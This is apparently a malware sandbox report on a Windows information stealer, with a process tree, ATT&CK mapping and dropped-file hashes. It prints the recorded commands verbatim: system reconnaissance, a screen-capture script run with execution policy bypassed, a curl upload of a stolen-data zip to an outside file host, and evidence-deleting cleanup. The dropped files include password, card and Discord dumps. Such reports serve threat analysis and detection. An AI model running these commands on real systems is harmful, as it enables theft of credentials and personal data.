- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:5620
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:3484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2604
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:1548
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3784
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4140
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:5512
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:5568
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    - Blocklisted process makes network request
    PID:824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2816
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:5172
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4720
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:1348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1528
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4856
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:1180
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2616
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:5596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2864
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:5140
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
  2⤵
  PID:4036
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Imkbeuox.zip";"
  2⤵
  PID:2768
- - C:\Windows\system32\curl.exe
    curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Imkbeuox.zip";
    3⤵
    PID:6088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:6080
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:424
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:1044
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:6112
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:6116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:5304
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:648
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:5300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:2512
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:404
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:3936
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2680
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:5096
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:5384
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:5464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:5664
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:2944
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:5420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:1628
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:5228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:5404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2972
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1484
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:5468
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:5136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4624
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:2884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
  2⤵
  PID:1852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3752
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:5572
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:5344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:824
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2276
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:128
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:5868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4492
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4892
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3380
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:1864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:956
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:5596
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4800
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:5160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2824
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:5140
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:576
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:6124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4900
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:448
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:6084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:852
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:5152
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:5368
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1092
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:5908
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:5876
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:5632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:1960
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4180
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3936
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1444
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:6096
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:1088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:5272
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3676
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3320

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Steam\Launcher\EN-IMK~1\debug.log

Filesize
2KB

MD5
756337e1c36769cb94b2c644c2465351

SHA1
77597d7734ad3c5e6654fcdcb56345d79519fb7d

SHA256
e89056267afd1c7a1ad15bf3456de80907ac27f78f5d61e981717c35515fed9f

SHA512
b841b4b68f212dab80396d818b3ea5d6238fdefb9dbfa598c72ffa772c1a33058884731939009b0fa61bd9c85443269e7b7d1ff5d390cad87fded44a97d9739e

Download Submit
C:\ProgramData\Steam\Launcher\EN-Imkbeuox.zip

Filesize
2KB

MD5
32c8b4aa54fe9f4ba7210c8ef0c05c1e

SHA1
436d9b38cd81ea36cb93184243517d279e845160

SHA256
4f1127887b8cfbf1589581795fe5b8c93e79a8c51cc74e901f0b61bd2e2c339f

SHA512
1cc1cfd21d6c4840c0ed9366779cf242beec91baa4ff27e43fd4cd56d60c8c931fdb202f4c2b521566795730c64e819a6311993f29844b2fc240633e580e1e6c

Download Submit
C:\ProgramData\Steam\Launcher\EN-Imkbeuox\Autofills\Autofills.txt

Filesize
94B

MD5
2f308e49fe62fbc51aa7a9b987a630fe

SHA1
1b9277da78babd9c5e248b66ba6ab16c77b97d0b

SHA256
d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521

SHA512
c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

Download Submit
C:\ProgramData\Steam\Launcher\EN-Imkbeuox\Cards\Cards.txt

Filesize
70B

MD5
8a0ed121ee275936bf62b33f840db290

SHA1
898770c85b05670ab1450a96ea6fbd46e6310ef6

SHA256
983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709

SHA512
7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

Download Submit
C:\ProgramData\Steam\Launcher\EN-Imkbeuox\Discord\discord.txt

Filesize
15B

MD5
675951f6d9d75fd2c9c06b5ff547c6fd

SHA1
9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09

SHA256
60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244

SHA512
44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

Download Submit
C:\ProgramData\Steam\Launcher\EN-Imkbeuox\Passwords\Passwords.txt

Filesize
78B

MD5
c5e74f3120dbbd446a527e785dfe6d66

SHA1
11997c2a53d19fd20916e49411c7a61bfb590e9c

SHA256
e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05

SHA512
a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f

Download Submit
C:\ProgramData\Steam\Launcher\EN-Imkbeuox\Screenshots\Screenshot.png

Filesize
422KB

MD5
ed41dc76de30f9eece3dcb13f0b4b20c

SHA1
b9609e80e7eacf0d1a92f9ce7323b2844476dd68

SHA256
7d3f1ec0fcf248883bfaf01e4a695dcb9e2badb8c4e7d52adef51c16bc2bb0d6

SHA512
9cf1d77ae1ebb5c91ac3b7e1e2928c187e50958c5be527d5ebda6c3e6989cd4297205ce25c8288de59457b400519e1f7998490bea7ca46f914696488b3de0c44

Download Submit
C:\ProgramData\Steam\Launcher\EN-Imkbeuox\Serial-Check.txt

Filesize
506B

MD5
2c81116f6e716a42ab4e0f27a6aa1c90

SHA1
9b4a00fdf0ed4fb8088181328683ebe1dbda69e4

SHA256
5233aa8baba33ff93976243d70565a28c5a949df2857e0547a7c1fc4ddc0d972

SHA512
59e3f311df94d83a29c4beb81c407342c674ae5433011a740b324544da4bfae6390718a9feece62b21f942386a417f16f1544d85e7de7d02d73ffe57b850c38b

Download Submit
C:\ProgramData\Steam\Launcher\EN-Imkbeuox\debug.log

Filesize
1KB

MD5
a0ed881b3f798ccc653c41e8e51cc166

SHA1
4754ae583b630e00f0d5458b369b09f36fd85435

SHA256
2215d066fb84776fd0d693c96cc719a843bff940221bc703bbfc4c9b856a62c5

SHA512
acd17e0d22633b6c66507b41df12fcc7d074dfed05ec05a3800171d64c0c7d81c56088fc7e5d0b152603d8bcc1a3b71aed6b0f76c76eb94150ece63420b77976

Download Submit
C:\ProgramData\Steam\Launcher\EN-Imkbeuox\stolen_files.zip

Filesize
22B

MD5
76cdb2bad9582d23c1f6f4d868218d6c

SHA1
b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

SHA256
8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

SHA512
5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

Download Submit
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

Filesize
1KB

MD5
9093dc7c5ab1910078dc35c18a7aa273

SHA1
129765beb5967eab50c86369fd7df32b2cb7c20a

SHA256
f3ee3ab5d2305a82dfb15fb9e57ba74df9b8370c6da9b4255fa44732eefe36d3

SHA512
f98b18a7fffd3a76122d7f1b730a32e0eb1ebb1cfc419f627ad771f5fb8f954f4338a3b6ffdbd4bac356f15b8c0bb33797fe62090b7183b6364088d42197041e

Download Submit
C:\ProgramData\edge\Updater\Get-Clipboard.ps1

Filesize
3KB

MD5
a8834c224450d76421d8e4a34b08691f

SHA1
73ed4011bc60ba616b7b81ff9c9cad82fb517c68

SHA256
817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5

SHA512
672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

Download Submit
C:\ProgramData\edge\Updater\RunBatHidden.vbs

Filesize
146B

MD5
14a9867ec0265ebf974e440fcd67d837

SHA1
ae0e43c2daf4c913f5db17f4d9197f34ab52e254

SHA256
cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1

SHA512
36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fd062a3371a3a1be8b6b4b3cdc70597e

SHA1
9fff57530cc73df9f7bc27673d6af7adad4d96a7

SHA256
3960a9dd6f04913bf5f3b21b68ad4bf796150b19625731f6a1af7f28308b18e9

SHA512
be289337b6ac6c11960457f6c5b4294c40387ceede69e68ff03171d65ed6cd38fa19300fd346f16005febad7f35b3eed9f8de66e41301c3a8cb114945e2c13a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
332009ca2c1352c9914ac8ce5f2f4fa3

SHA1
2200ceb14c41066e42edd96e96ef7c2a07dda8f7

SHA256
21319a67b56a37dc487c0f91fa61169775e8557e8cea4bfcafaad46f18f34119

SHA512
fd7c70f5c2c8837d0691dd1f2af35d364ddb93a70311aa37fa395cbd5de7702e89201b31a9b007a5a2238051e54fe4786321c44ec93750dee01bf45425972415

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
58f5e5370fe7d52c58359a86c8ec5931

SHA1
ced3616e7d99b7267f5c333ffc83c3431b2ee48a

SHA256
6d42b9d59b39a20087863c9a84a5f0c13f9823f59d7771cf5cff38d55ff50089

SHA512
b4dd9e92ff0526ef0dc822c67868d1e94c796070fb65f55eac2e23c9b3fbd17d17308c6238e02f2c30acb364c991fdf582e503ed7e885dbf23c630a4c655f5e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d5d22ba8a0adc500adae9f137d41d0f

SHA1
d92ebec673369c3d43d66b570b5236155f6ca2bb

SHA256
